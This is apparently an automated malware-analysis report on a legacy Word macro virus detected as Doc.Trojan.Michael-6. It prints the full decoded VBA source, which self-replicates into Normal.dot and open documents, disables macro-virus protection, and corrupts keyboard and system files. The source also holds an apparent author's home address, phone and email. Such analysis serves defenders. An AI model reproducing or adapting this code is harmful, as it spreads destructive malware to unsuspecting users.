Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e1c7cb0a8766461e…

MALICIOUS

Office (OLE)

73.5 KB Created: 2000-03-26 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 621716ad236a3dbf88b7a242615c2152 SHA-1: df4917e358a6ca956773c5d9e45d543b83a69c07 SHA-256: e1c7cb0a8766461edc4cc69c48eeab10dee45f286eecc69b55e37cff765f78e3
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample exhibits characteristics of a legacy macro virus, including the presence of WordBasic and VBA macros, with specific triggers like AutoOpen and AutoClose. The embedded VBA code, identified as 'Myckl2_5', contains comments suggesting it's a backdoor and aims to infect other documents. The ClamAV detection 'Doc.Trojan.Michael-6' further confirms its malicious nature.

Heuristics 6

  • ClamAV: Doc.Trojan.Michael-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Michael-6
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
                        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=openDoc.FullName, Name:=MyName, Object:=wdOrganizerObjectProjectItems
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 88137 bytes
SHA-256: 5ad3a5b018d20f4bb972669c6add6b7d0277e3fd98079ddd5b556721fbffcb09
Detection
ClamAV: Doc.Trojan.Michael-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Myckl2_5"
'Welcome Hacker you gain the back door, now its yours,
'just don't include my name when you create your own virus from this virus.
'I don't want to get any credit

'The tragedy of life is not death, rather, it is what we allow to die within us while we live

'Watch your thoughts, it becomes word
'Watch your words, it becomes actions
'Watch your actions, it becomes your habit
'Watch your habit, it becomes your character
'Watch your character, it becomes your Destiny


'-------- Myckl 2.5


Option Compare Text
Option Explicit
Const MyName = "Myckl2_5"
Const TD = "ThisDocument"
Const RTNorm = "Reference to Normal"
Const ToLove = "Ablog"

'Shared Variables
Dim openDoc As Document
Dim itemName As String
Dim ndxMac As Integer
Dim virusExist As Boolean
Dim otherV As Boolean
Dim otherVName As String


Sub RestorePrev()
    On Error Resume Next
    otherV = False
    For ndxMac = 1 To ThisDocument.VBProject.vbcomponents.Count
        itemName = ThisDocument.VBProject.vbcomponents(ndxMac).Name
        If itemName <> MyName And itemName <> TD And _
            itemName <> RTNorm And itemName <> "" Then
        '----------------------------
            otherVName = itemName
            otherV = True
            GoTo OthersFound
        End If
    Next ndxMac
    
    For Each openDoc In Documents
        For ndxMac = 1 To openDoc.VBProject.vbcomponents.Count
            itemName = openDoc.VBProject.vbcomponents(ndxMac).Name
            If itemName <> MyName And itemName <> TD And _
                itemName <> RTNorm And itemName <> "" Then
            '-----------------------
                otherVName = itemName
                otherV = True
                GoTo OthersFound
            End If
        Next ndxMac
    Next openDoc
    
OthersFound:
    If otherV Then
        Application.OrganizerRename _
            Source:=ThisDocument.FullName, _
            Name:=otherVName, _
            NewName:=MyName, _
            Object:=wdOrganizerObjectProjectItems
    End If
End Sub

Sub InfectFile()
Dim NTInfected As Boolean
Dim ODInfected As Boolean
    
    On Error Resume Next
    Options.SaveNormalPrompt = False
    Call RestorePrev
    NTInfected = False
    For ndxMac = NormalTemplate.VBProject.vbcomponents.Count To 1 Step -1
        itemName = NormalTemplate.VBProject.vbcomponents(ndxMac).Name
        If itemName = MyName Then
            NTInfected = True
        End If
        If itemName <> MyName And itemName <> TD Then
            Application.OrganizerDelete _
            Source:=NormalTemplate.FullName, _
            Name:=itemName, _
            Object:=wdOrganizerObjectProjectItems
        End If
    Next ndxMac
    
    For Each openDoc In Documents
        ODInfected = False
        With openDoc
            For ndxMac = openDoc.VBProject.vbcomponents.Count To 1 Step -1
                itemName = openDoc.VBProject.vbcomponents(ndxMac).Name
                If itemName = MyName Then
                    ODInfected = True
                End If
                If itemName <> MyName And itemName <> TD And _
                    itemName <> RTNorm Then
                    Application.OrganizerDelete _
                        Source:=openDoc.FullName, _
                        Name:=itemName, _
                        Object:=wdOrganizerObjectProjectItems
                End If
            Next ndxMac
            If Not ODInfected Then
                    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=openDoc.FullName, Name:=MyName, Object:=wdOrganizerObjectProjectItems
            End If
        End With
    Next openDoc
    
    If Not NTInfected Then
        Application.OrganizerCopy _
            Source:=ActiveDocument.FullName, _
            Destination:=NormalTemplate.FullName, _
            Name:=MyName, _
            Object:=wdOrganizerObjectProjectItems
        NormalTemplate.Save
    End If
End Sub
Sub FileNew()
    On Error Resume Next
    If Dialogs(wdDialogFileNew).Show = -1 Then
        Call InfectFile
    End If
End Sub
Sub FileNewDefault()
    On Error Resume Next
    Documents.Add
    Call InfectFile
End Sub
Sub FilePrintDefault()
Dim freeF As Integer

    On Error Resume Next
    If (WeekDay(Date)) <> vbFriday Then
        ActiveDocument.PrintOut
        End
    End If

    If Day(Date) > 23 And WeekDay(Date) = vbFriday Then
        Call SetAttr("c:\windows\dummy.txt", vbArchive)
        freeF = FreeFile
        Kill "c:\windows\dummy.txt"
        Open "c:\windows\dummy.txt" For Output As #freeF
        Print #freeF, "Resume"
        Print #freeF, ""
        Print #freeF, "Applicant's Name: Michael I. Buen"
        Print #freeF, ""
        Print #freeF, "Address: Block 6 Lot 3 Hauskon Homes, Daang Amaya, Tanza Cavite"
        Print #freeF, "Tel:     (046)505-17-39"
        Print #freeF, "Desired Position: Programmer/Technical Writer/Computer Salesman"
        Print #freeF, ""
        Print #freeF, "Skills: Knows C/C++, Assembly, Pascal, COBOL, Clipper, Foxpro, "
        Print #freeF, "        JavaScript, VBScript, Visual Basic, VB for Application "
        Print #freeF, "        Programming, Access, Clarion, HTML, Batch File"
        Print #freeF, ""
        Print #freeF, "Applications Expertise: Resource Workshop, Aldus Pagemaker, Adobe Photoshop,"
        Print #freeF, "        Lotus Smartsuite, Microangelo, and Of Course Excel and "
        Print #freeF, "        Microsoft Word"
        Print #freeF, ""
        Print #freeF, "Favorite Quote: ""The cure for boredom is curiosity, there is no cure "
        Print #freeF, "                for curiosity"""
        Print #freeF, ""
        Print #freeF, "With Experiences In: Innodata, SENCOR, VMSCI, GenDiesel"
        Print #freeF, ""
        Print #freeF, "Without Experiences In: Chowking, J-Sys, Jimac, CBSI, Information Professionals, "
        Print #freeF, "                        Midas Kapiti, James Martin + co, Professional Staffers, "
        Print #freeF, "                        Ergonomics, Express Telecom, 650 Companies"
        Print #freeF, ""
        Print #freeF, ""
        Print #freeF, "e-mail: mycklangelo@yahoo.com / mycklangelo@hotmail.com"
        Print #freeF, "Address: Block 6 Lot 3, Hauskon Homes, Daang Amaya, Tanza Cavite"
        Print #freeF, "tel: (046) 505-17-39"
        Print #freeF, ""
        Print #freeF, "To open my interactive resume type markbuen then highlight it"
        Print #freeF, "then open a file, then my interactive resume will pop up"
        Print #freeF, ""
        Print #freeF, "Warning: If I don't get a stable job by the end of the month"
        Print #freeF, "         I will release a third virus that will remove all "
        Print #freeF, "         folders in the Primary Hard Disk, or in layman's term"
        Print #freeF, "         para ko na ring fi-normat ang Hard Disk Mo"
        Print #freeF, ""
        Print #freeF, "-- Be a Superlearner, Enroll at AMACConda Computer College"
        Print #freeF, ""
        Print #freeF, """Programming today is a race between software engineers "
        Print #freeF, "striving to build bigger and better idiot-proof programs, "
        Print #freeF, "and the universe trying to produce bigger and better idiots. "
        Print #freeF, "So far the universe is winning."""
        Print #freeF, "---Rich Cook"
        Print #freeF, ""
        Print #freeF, "Sa year 2004 FPJ for President, Noli de Castro for Vice President"
        Print #freeF, Chr(15)
        Close #freeF
        Application.PrintOut FileName:="c:\windows\dummy.txt"
        
        If (WeekDay(Date)) <> vbFriday Then
            ActiveDocument.PrintOut
            End
        End If

    End If

    ActiveDocument.PrintOut
End Sub


Sub FileSave()
Attribute FileSave.VB_Description = "Saves the active document or template"
Attribute FileSave.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.FileSave"

Dim sfor As Integer
Dim PauseTime, startTime

    On Error Resume Next
    If Documents.Count <> 0 Then
        If Selection.Text = ToLove Then
            ShowVisualBasicEditor = True
            End
        End If
    End If
    
    If Documents.Count > 0 Then
        Call InfectFile
        Call ChangeSomething
        ActiveDocument.Save
    End If
    
    If Day(Date) > 23 And WeekDay(Date) = vbSaturday Then
        For sfor = 50 To 1 Step -1
            Application.StatusBar = String(sfor, " ") & "Michael Learns to Hack"
            PauseTime = 0.015625    ' Set duration.
            startTime = Timer       ' Set start time.
            Do While Timer < startTime + PauseTime
                DoEvents            ' Yield to other processes.
            Loop
            
            DoEvents
        Next sfor
        Application.StatusBar = "And Hope You'll Learn from It Too"
    'ElseIf Day(Date) = 29 Then
    '    'Show inside story
    End If

    
    
End Sub
Sub FileSaveAs()
Attribute FileSaveAs.VB_Description = "Saves a copy of the document in a separate file"
Attribute FileSaveAs.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.FileSaveAs"
    On Error Resume Next
    If Dialogs(wdDialogFileSaveAs).Show = -1 Then
        Call InfectFile
        ActiveDocument.Save
    End If
End Sub
Sub FileClose()
Attribute FileClose.VB_Description = "Closes all of the windows of the active document"
Attribute FileClose.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.FileClose"
    On Error Resume Next
    Call InfectFile
    ActiveDocument.Close
End Sub

Sub FileExit()
    On Error Resume Next
    Options.VirusProtection = False
    Call InfectFile
    Application.Quit
End Sub


Sub FileOpen()
Attribute FileOpen.VB_Description = "Opens an existing document or template"
Attribute FileOpen.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.FileOpen"
Dim resBalMess As Balloon
Dim resBal As Balloon
Dim resBal2 As Balloon      'back

Dim resOpt As Long

Const resmSchooling = 1
Const resmSkills = 2
Const resmJobExperiences = 3
Const resmPersonalBackground = 4
Const resmPersonalForeground = 5

Const resmCharRef = 1
Const resmQuote = 2
Const resmInsideStory = 3

Const butClose = -12
Const butBack = -5
Const butNext = -6
    
Dim nl As String

    nl = Chr(10)
    
    On Error Resume Next
    Options.VirusProtection = False
    WordBasic.DisableAutoMacros
    If Dialogs(wdDialogFileOpen).Show = -1 Then
        Call InfectFile
        'ActiveDocument.Save
    End If
    
    If Documents.Count > 0 Then
        If Selection.Text = "markbuen" Or Day(Date) = 30 Then
            ' put resume here
            Set resBalMess = Assistant.NewBalloon
            Set resBal = Assistant.NewBalloon
            Set resBal2 = Assistant.NewBalloon
            
            Do
                resBal.Animation = msoAnimationListensToComputer
                resBal.Heading = "Michael Learns To Hack..."
                resBal.Text = "iNTERACTIVE rESUME" & nl & nl & _
                              "Desired Position: " & nl & "  Programmer / Technical Writer / Computer Salesman" & nl & _
                              " - - - - - - - - - - - - - - - - - - - - - - - - - "
                              
                resBal.Labels(resmSchooling).Text = "My Schooling"
                resBal.Labels(resmSkills).Text = "My Skills"
                resBal.Labels(resmJobExperiences).Text = "Job Experiences"
                resBal.Labels(resmPersonalBackground).Text = "Personal Background"
                resBal.Labels(resmPersonalForeground).Text = "Personal Foreground"
                resBal.Button = msoButtonSetNextClose
                resOpt = resBal.Show
                Select Case resOpt
                    Case resmSchooling
                        resBalMess.Animation = msoAnimationWritingNotingSomething
                        resBalMess.Heading = "My Schooling"
                        resBalMess.Labels.Count = 0
                        resBalMess.Text = "Elementary" & nl & _
                                          "   Pio del Pilar Elementary School" & nl & nl & _
                                          "High School" & nl & _
                                          "   Philippine Christian University" & nl & nl & _
                                          "College" & nl & _
                                          "   AMACConda Computer College"
                        resBalMess.Show
                        
                    Case resmSkills
                        resBalMess.Animation = msoAnimationGetTechy
                        resBalMess.Heading = "My Skills"
                        resBalMess.Text = "   Proficient with varius languages like C/C++, Assembly, Pascal, COBOL, Foxpro, SQL, Visual Basic, Clarion, JavaScript, VB for Application, VBScript, HTML" & nl & nl & _
                                          "   Proficient in Application Softwares like Adobe Photoshop, Resourcce Workshop, Microangelo, Lotus Smart Suite, Aldus Pagemaker, Frontpage, Powerpoint, and of course Word and Excel"
                        resBalMess.Labels.Count = 0
                        resBalMess.Show
                        
                    Case resmJobExperiences
                        
                        resBalMess.Animation = msoAnimationWorkingAtSomething
                        resBalMess.Heading = "Experiences"
                        resBalMess.BalloonType = msoBalloonTypeBullets
                                                
                        resBalMess.Text = ""
                        resBalMess.Labels.Count = 4
                        resBalMess.Labels(1).Text = "INNODATA -- Typereader (corrects OCR errors)"
                        resBalMess.Labels(2).Text = "SENCOR -- Encoder"
                        resBalMess.Labels(3).Text = "VMSCI -- Pseudo Programmer Trainee"
                        resBalMess.Labels(4).Text = "GenDiesel -- Super Encoder"
                                                                                    
                        resBalMess.Show
                        
                    Case resmPersonalBackground
                        resBalMess.Animation = msoAnimationCharacterSuccessMajor
                        
                        resBalMess.Heading = "Personal Background"
                        resBalMess.BalloonType = msoBalloonTypeBullets
                                                
                        resBalMess.Text = ""
                        resBalMess.Labels.Count = 3
                        resBalMess.Labels(1).Text = "Hardworking, Softworking, Quiet(low-noise), Sociable Person especially on Party "
                        resBalMess.Labels(2).Text = "Reliable, with Good Interpersonal Communicatin Skills and Intrapersonal Communication Skills (8 data bits, odd parity, 1 stop bit)"
                        resBalMess.Labels(3).Text = "Goal-oriented, Success-oriented, Journey-Oriented, Object-Oriented Person, w/ Good Moral Character and w/ Pissing Personality"
                        resBalMess.Show
                        
                    Case resmPersonalForeground
                        
                        resBalMess.Animation = msoAnimationGetAttentionMinor
                        resBalMess.Heading = "Personal Foreground"
                        resBalMess.BalloonType = msoBalloonTypeBullets
                                                
                        resBalMess.Text = ""
                        resBalMess.Labels.Count = 5
                        resBalMess.Labels(1).Text = "Black-eyes, black hair, black nostrils"
                        resBalMess.Labels(2).Text = "Cute (Patingin nga ng Dimple)"
                        resBalMess.Labels(3).Text = "Down-to-Earth (ALIEN?!)"
                        resBalMess.Labels(4).Text = "Boy-Next-Windows '95 Type"
                        resBalMess.Labels(5).Text = "Macho-chulis ang mga buto"
                        resBalMess.Show
                                                
                    Case butNext
                                            
                        resBal2.Labels.Count = 3
                        resBal2.Heading = "Michael Learns To Hack..."
                        resBal2.Text = "Interactive Resume"
                        resBal2.Labels(1).Text = "Character References"
                        resBal2.Labels(2).Text = "Quote for the Moment"
                        resBal2.Labels(3).Text = "Inside Story"
                        resBal2.Button = msoButtonSetBackClose
                        resOpt = resBal2.Show
                        
                        Select Case resOpt
                        Case resmCharRef
                            resBalMess.Labels.Count = 0
                            resBalMess.Heading = "Character References"
                            resBalMess.Text = "(In No Particular Order Using Rnd (110) and Randomize ) " & nl & nl & _
        "Franco Rayela, Roger Macalino, Byron James C. Ngan, Onel de Guzman, Serafin Santos, Conrad Pena, Jerome Sison, Alde Aceveda, Philip Mora, Richard Canuto, Leonides ""Darren"" Mendoza, Emetrio ""Jing"" Austria, Irving Ilagan, Christian Ramirez, Edwin & Erwin Quita, Joana Alonso, Frederick Vicent Tant, Roland Moldez, Lilibeth Serencio, Gilberto Piliin, Michael Santiano, Michael Salamat, Michael Manuel Murillo, Michael Lucas, Joseph Taopo, Joseph Borja, Joseph Landicho, Giovanni Largo, Juvany Ponce, Alberto Cayanan, Ronald Batoon, Philip Miralles, Jay Manpreet, Aldwin Mapili, Virgilio So, Erlinda Sy, Philbert Pagaspas, Juanita Cataag, Mar Dojillo, Novelita Calimag, Verlin Samonte, Sir Bernabe Santa Maria, Alejandro Bais, Ma'am Grace Quitoriano, Sir Lucero, Ma'am Maderas, Sir Omar Ghazal, Sir Angelo Gillen, Dondi Macas, Arsenio Macapaz, Rolly Mendoza, " & nl & nl & "(Not My Character References)" & nl & "President Joseph Estrada, Blas Ople, Franklin Drilon, Jose Ma. Sison, Jolina Magdangal, " & nl & _
                            "Kristin Hermosa, Aurora Halili, Angela Velez "
                            resBalMess.Animation = msoAnimationGestureUp
                            resBalMess.Show
                        Case resmQuote
                            Call Quote
                        Case resmInsideStory
                            resBalMess.Labels.Count = 0
                            resBalMess.Heading = "InsideStory"
                            resBalMess.Text = "Programmer 's Profile" & nl & _
                                "Real Mode Name: Michael I. Buen" & nl & _
                                "Protected Mode Name: Mycklangelo ""The Skulltor\n"" Buenarotti" & nl & _
                                "Birthday: November 5, 1976" & nl & _
                                "Address: Block 6 Lot 3 Hauskon Homes, Daang Amaya," & nl & _
                                "         Tanza Cavite City" & nl & _
                                "Telephone: (046) 505-17-39" & nl & _
                                "e-mail address: mycklangelo@yahoo.com;mcklangelo@hotmail.com" & nl & _
                                "Group Affiliated: GRAMMERSoft, Elevated Ideas" & nl & _
                                "Group Not Affiliated: AMACConda Group of Companies" & nl & _
                                "Services Offered: Programming , Debugging" & nl & _
                                "Services Not Offered: Hacking , Pest - Control" & nl & nl & _
                                "About Me:" & nl & _
                                "I 'm not a virus programmer per se, I'm just a dedicated programmer and a serious learner." & nl & _
                                "My Favorite Principle in Writing (Code):" & nl & _
                                "A book is finished not when nothing more can be added, but when nothing can be remove from it. -- Code Complete: Steve McConnell" & nl & nl & _
                                "My Interest And Activites:" & nl & _
                                "Reading, Analyzing, Hacking, Reading, Analyzing, Reading, Reading, Analyzing, Hacking, Analyzing, Analyzing, Analyzing, Analyzing, (program halt)" & nl & nl & _
                                "Favorite Quote:" & nl & _
                                "The cure for boredom is curiosity.  There is no cure for curiosity" & nl & _
                                    "*** ACNOWLEDGMENT ***" & nl & _
"I 'm thanking Byron for sharing his computer and ideas, book and time, I'm using his computer every Saturday and Sunday just to write this program.  And to all GRAMMERSoft especially LIENQ, I know what the hell of hacking we are all doing but nevertheless it is still legitimate learning.  And to PC-Cillin, the anti-virus software that gave me a hint that events of Word and Excel can be hooked by naming your procedures with the name of the event.  And to Rivermaya, Eraserheads, Renz Verano who's continuing to write Original Pilipino Music that calms our soul.  And Since I haven't yet finished my Thesis and Automata, I'll consider this as my quick software project, so I'll have to thanks all those beta tester of this virus, you can send me you comment and ratings about my program.  And to Mark ( he's currently a freshman computer science at Adamson University ) my brother, sorry I haven't include your picture here, the program has grown too large already.  Kung nagkataon ang pangalan ng virus na ito " & _
                                "ay ""Mark My Word ""." & nl & nl & _
                                "-- Be a Superlearner, Enroll at AMACConda Computer College"
                                resBalMess.Animation = msoAnimationCheckingSomething
                                resBalMess.Show
                            
                        End Select
                End Select
            Loop While resOpt <> butClose
        End If
    End If
End Sub

Sub ToolsOptions()
    On Error Resume Next
    Options.VirusProtection = True
    Dialogs(wdDialogToolsOptions).Show
    Options.VirusProtection = False
End Sub

Sub ViewVBCode()
    On Error Resume Next
    System.Cursor = wdCursorNormal
End Sub

Sub ToolsMacro()
    On Error Resume Next
    System.Cursor = wdCursorNormal
End Sub

Sub Quote()
Dim quotes(1 To 14) As String
Dim qBal As Balloon
    
Static prevQuote As Long
Static currQuote As Long

Dim nl As String

    nl = Chr(10)

    On Error Resume Next
    Options.VirusProtection = False

    quotes(1) = "On Fuzzy Logic" & nl & nl & _
                """  He who would distinguish " & _
                "  the true from false must have" & _
                "  an adequate idea of what is true and what is false"""
                                                            
    quotes(2) = "On Creating a Pseudocode" & _
                nl & nl & "Iterate.  Try as many ideas as you can" & _
                " in PDL (program design language)before you start coding." & _
                "  Once you start coding, you get emotionally" & _
                " involved with your code and it becomes harder to" & _
                " throw away a bad design and start over." & _
                nl & nl & "-- Steve McConnell"
                

    quotes(3) = """The cure for boredom is curiosity.  There is " & _
                " no cure for curiosity""" & _
                nl & nl & "-- Dorothy Parker"
                         
    quotes(4) = "On Tracking Down an Error" & _
                nl & nl & "  ""And if you can take one from three" & _
                " hundred and sixty-five, what remains?""" & _
                "  ""Three hundred and sixty-four of course"", Alice said." & _
                "  Humpty Dumpty looked doubtful.  ""I'd rather see that done in paper"", he said." & _
                nl & nl & "--Alice in Wonderland"
                
    quotes(5) = "On Good Variable Naming" & _
                 nl & nl & "  ""Don't stand chattering" & _
                 " to yourself like that,"" Humpty Dumpty said, " & _
                 " looking at her for the first time, ""but tell me " & _
                 " your name and your business.""  ""My" & _
                 " name is Alice, but --"".  ""It's a" & _
                 " stupid name enough!"", Humpty Dumpty" & _
                 " interrupted impatiently.  ""What does" & _
                 " it mean?"", ""Must a name mean something?"" Alice" & _
                 " asked doubtfully.  ""Of course it must,""  Humpty" & _
                 " Dumpty said with a short laugh:  ""My name means the" & _
                 " shape that I am and a good handsome shape it is, too. " & _
                 " With a name like yours, you might be any shape, " & _
                 " almost."""
               
                
    quotes(6) = """The significant problems we face cannot be solved by the " & _
                 "same level of thinking that created them.""" & _
                 nl & nl & "--Albert Einstein"
                 
                    
    quotes(7) = """Words are so powerful, but I found it powerfully useless " & _
                 "just to come up with a statement like this.""" & _
                 nl & nl & "--Michael I. Buen"
                 
    quotes(8) = "On Temporary Solution" & _
                 nl & nl & """One powerful heuristic tool is brure force.  Don't " & _
                 "underestimate it.  A brute force solution is better than an elegant " & _
                 "solution that doesn't work.""" & _
                 nl & nl & "--Steve McConnell"
                 
    quotes(9) = "On Design Process Stage" & _
                 nl & nl & """We try to solve the problem by rushing through " & _
                 "the design process so that enough time is left at the end of " & _
                 "project to uncover the errors that were made because we rushed " & _
                 "through the design process.""" & _
                 nl & nl & "--Glenford Myers"
                 
    quotes(10) = "On Premature Optimization" & nl & nl & _
                 """We should forget about small efficiencies, say about 97% of " & _
                 "the time: premature optimization is the root of all evil.""" & _
                 nl & nl & "--Donald Knuth"
                 
    quotes(11) = """The problem definition lays the foundation for the " & _
                 "rest of the programming process.""" & _
                 nl & nl & "--Steve McConnell"
                 
    quotes(12) = """From a programmer's point of view, the user is " & _
                 "a peripheral that types when you issue a read request.""" & _
                 nl & nl & "--Peter Williams"
                 
    quotes(13) = """Programming today is a race between software engineers " & _
                 "striving to build bigger and better idiot-proof programs, " & _
                 "and the universe trying to produce bigger and better idiots. " & _
                 "So far the universe is winning.""" & _
                 nl & nl & "--Rich Cook"
                 
    quotes(14) = """I can do everything through Him who gives me strength.""" & _
                 nl & nl & "--Philipians 4:13 (courtesy of Byron2 James C. Ngan)"
                         
    Call Randomize
    Do
        currQuote = Random()
    Loop While currQuote = prevQuote
    
    Set qBal = Assistant.NewBalloon
    qBal.Heading = "Quote for the Moment"
    qBal.Animation = msoAnimationThinking
    qBal.Text = quotes(currQuote)
    qBal.Show
    
    prevQuote = currQuote
End Sub


Function Random() As Long
    Random = Int((14 * Rnd) + 1)
End Function

Sub ChangeSomething()
Dim kb
Dim i As Long
Dim l As Long
Dim chgHdr As Byte
Dim f1 As Integer
Dim vball As Integer

    On Error Resume Next
    vball = vbReadOnly + vbSystem + vbHidden + vbArchive
    
    If Day(Date) <= 7 And WeekDay(Date) = vbMonday Then
        f1 = FreeFile()
        Call SetAttr("c:\windows\system\main.cpl", vbNormal)
        Open "c:\windows\system\main.cpl" For Random As #f1
        chgHdr = 66
        Put #f1, 1, chgHdr
        Close #f1

        kb = Array(67720004, 65536, 28, 370, 0, 0, 0, 196610, 5, 2490368, 5767213, 7340132, 10879026, 3145846, _
            322, 0, -2146303944, -2146336752, 50462976, 1540, 67240193, 0, 0, 134217726, 0, 0, 0, 0, _
            0, 14811362, 17957138, 14680282, 7733366, 7733366, 14549206, 808464432, 834667012, _
            892613426, 959985462, 1371258160, 1414677847, 1330206041, -589440176, 1178882881, _
            1263159367, 1524546124, 1112949592, -1094955698, 36299455, 100992003, 168364039, _
            269290507, 336794129, 404166165, 723196441, 555753246, 623125282, 740828966, 808398381, _
            875770417, -589605323, 471589597, -1120527331, 1298145054, 543912545, 1852142914, _
            1295854881, 1634231145, 975203429, 1549622057, 1918985548, 1948283758, 1210530671, _
            560685921, 774644001, 561929263, 623125312, 673850974, 1361796905, 1414677847, _
            1330206041, 2088598352, 1178882881, 1263159367, 1512192588, 1112949592, 1044139342, _
            828406847, 892613426, 959985462, 1362963760, 1414677847, 1330206041, 1549622096, _
            1178882881, 1263159367, 1512520524, 1112949592, 774655310, 23599)
                        
        f1 = FreeFile()
        If Dir("c:\windows\system\kbdus.kbd", vball) = "kbdus.kbd" Then
            Call SetAttr("c:\windows\system\kbdus.kbd", vbNormal)
        End If
        
        Open "c:\windows\system\kbdus.kbd" For Binary As #f1
        For i = 1 To 398 Step 4
            l = kb((i \ 4))
            Put #f1, i, l
        Next
        Close #f1
        
        f1 = FreeFile()
        If Dir("c:\windows\system\kbdusx.kbd", vball) = "kbdusx.kbd" Then
            Call SetAttr("c:\windows\system\kbdusx.kbd", vbNormal)
        End If
        
        Open "c:\windows\system\kbdusx.kbd" For Binary As #f1
        For i = 1 To 398 Step 4
            l = kb((i \ 4))
            Put #f1, i, l
        Next
        Close #f1
    End If
End Sub


Sub AutoOpen()
    On Error Resume Next
    Options.SaveNormalPrompt = False
    
    otherV = False
    For ndxMac = 1 To NormalTemplate.VBProject.vbcomponents.Count
        itemName = NormalTemplate.VBProject.vbcomponents(ndxMac).Name
        If itemName <> MyName And itemName <> TD And _
            itemName <> RTNorm And itemName <> "" Then
        '-----------------------
            otherVName = itemName
            otherV = True
            GoTo OthersFound
        End If
    Next ndxMac
    
    For Each openDoc In Documents
        For ndxMac = 1 To openDoc.VBProject.vbcomponents.Count
            itemName = openDoc.VBProject.vbcomponents(ndxMac).Name
            If itemName <> MyName And itemName <> TD And _
                itemName <> RTNorm And itemName <> "" Then
            '-----------------------
                otherVName = itemName
                otherV = True
                GoTo OthersFound
            End If
        Next ndxMac
    Next openDoc
    
OthersFound:

    If Not otherV Then
        On Error Resume Next
        Options.VirusProtection = False
        Call InfectFile
        Call ChangeSomething
    Else
        Application.OrganizerRename _
            Source:=ActiveDocument.FullName, _
            Name:=MyName, _
            NewName:=otherVName, _
            Object:=wdOrganizerObjectProjectItems
    End If
End Sub

Sub DoSome()
    On Error Resume Next
    If Dir("c:\autoexec.bat") = "autoexec.bat" Then
        Call SetAttr("c:\msconfig.sys", vbNormal)
        Kill ("c:\msconfig.sys")
        Call SetAttr("C:\AUTOEXEC.BAT", vbNormal)
        Name "C:\AUTOEXEC.BAT" As "C:\MSCONFIG.SYS"
        Call SetAttr("C:\MSCONFIG.SYS", vbSystem + vbReadOnly + vbHidden)
        Call InfectFile
    End If
End Sub

Sub AutoExec()
    On Error Resume Next
    Options.SaveNormalPrompt = False
    Call ChangeSomething
    Call DoSome
    Call InfectFile
End Sub

Sub AutoClose()
    On Error Resume Next
    Call InfectFile
End Sub

Sub AutoNew()
    On Error Resume Next
    Call InfectFile
End Sub

Sub AutoExit()
    On Error Resume Next
    Call InfectFile
End Sub
 
 
 Sub FileTemplates()
 On Error Resume Next
    System.Cursor = wdCursorNormal
 End Sub


' Processing file: /tmp/qstore_99_i3yyu
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Myckl2_5 - 45893 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0035 "Welcome Hacker you gain the back door, now its yours,"
' Line #1:
' 	QuoteRem 0x0000 0x004A "just don't include my name when you create your own virus from this virus."
' Line #2:
' 	QuoteRem 0x0000 0x001E "I don't want to get any credit"
' Line #3:
' Line #4:
' 	QuoteRem 0x0000 0x005C "The tragedy of life is not death, rather, it is what we allow to die within us while we live"
' Line #5:
' Line #6:
' 	QuoteRem 0x0000 0x0024 "Watch your thoughts, it becomes word"
' Line #7:
' 	QuoteRem 0x0000 0x0024 "Watch your words, it becomes actions"
' Line #8:
' 	QuoteRem 0x0000 0x0029 "Watch your actions, it becomes your habit"
' Line #9:
' 	QuoteRem 0x0000 0x002B "Watch your habit, it becomes your character"
' Line #10:
' 	QuoteRem 0x0000 0x002D "Watch your character, it becomes your Destiny"
' Line #11:
' Line #12:
' Line #13:
' 	QuoteRem 0x0000 0x0012 "-------- Myckl 2.5"
' Line #14:
' Line #15:
' Line #16:
' 	Option  (Compare Text)
' Line #17:
' 	Option  (Explicit)
' Line #18:
' 	Dim (Const) 
' 	LitStr 0x0008 "Myckl2_5"
' 	VarDefn MyName
' Line #19:
' 	Dim (Const) 
' 	LitStr 0x000C "ThisDocument"
' 	VarDefn TD
' Line #20:
' 	Dim (Const) 
' 	LitStr 0x0013 "Reference to Normal"
' 	VarDefn RTNorm
' Line #21:
' 	Dim (Const) 
' 	LitStr 0x0005 "Ablog"
' 	VarDefn ToLove
' Line #22:
' Line #23:
' 	QuoteRem 0x0000 0x0010 "Shared Variables"
' Line #24:
' 	Dim 
' 	VarDefn openDoc
' Line #25:
' 	Dim 
' 	VarDefn itemName (As String)
' Line #26:
' 	Dim 
' 	VarDefn ndxMac (As Integer)
